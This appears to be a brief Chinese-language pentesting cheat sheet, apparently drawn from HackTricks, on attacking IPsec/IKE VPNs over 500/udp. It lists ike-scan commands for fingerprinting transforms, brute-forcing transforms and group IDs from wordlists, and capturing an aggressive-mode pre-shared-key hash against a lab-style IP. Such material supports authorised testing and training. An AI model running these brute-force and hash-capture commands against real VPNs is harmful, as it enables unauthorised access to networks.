【ISAKMP】ike-scan

500/udp - Pentesting IPsec/IKE VPN - HackTricks

1. 利用

寻找有效的转换

ike-scan -M 10.10.11.87
  • 关注 AUTH,其值为 PSK。这意味着 VPN 是使用预共享密钥配置的(这有利用我们后续进行利用)

爆破有效的转换

while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt

查找正确的 ID(组名)并尝试获取哈希

ike-scan -P -M -A -n fakeID 10.10.11.87

使用 ike-scan 暴力破解常见的组名

while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt